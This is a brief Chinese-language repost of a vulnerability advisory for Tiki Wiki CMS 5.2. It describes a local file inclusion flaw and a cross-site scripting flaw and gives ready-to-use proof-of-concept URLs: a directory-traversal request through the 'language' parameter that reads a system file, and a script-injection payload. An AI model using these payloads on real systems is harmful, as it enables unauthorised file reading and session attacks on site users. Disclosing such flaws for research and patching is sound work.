漏洞标题:
ki Wiki CMS 本地文件包含和跨站脚本漏洞
ki Wiki CMS 本地文件包含以及跨站脚本漏洞
漏洞描述:
攻击者可以通过浏览器利用这些问题。利用一个跨站点脚本问题,攻击者必须诱使不知情的用户点击一个恶意的URI。
已发布到官网:
http://www.securityfocus.com/bid/43507
secureshell-h [email protected] 回信:
本地文件漏洞EXP:
http://127.0.0.1/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini
跨站脚本漏洞演示:
http://127.0.0.1/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
文章来源于lcx.cc:【漏洞】ki Wiki CMS本地文件包含及跨站脚本
文章来源于lcx.cc:看看IT强人如何求婚!相关推荐: 今天遇到一个微信公众平台注入的实例之前有过讨论(大家有考虑过微信公众平台的注入么),但是情况是我自己模拟出来的,今天终于遇到一个实例。 话不多说,上图。 附送盲打到的后台 [原文地址] 相关讨论: 1#…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论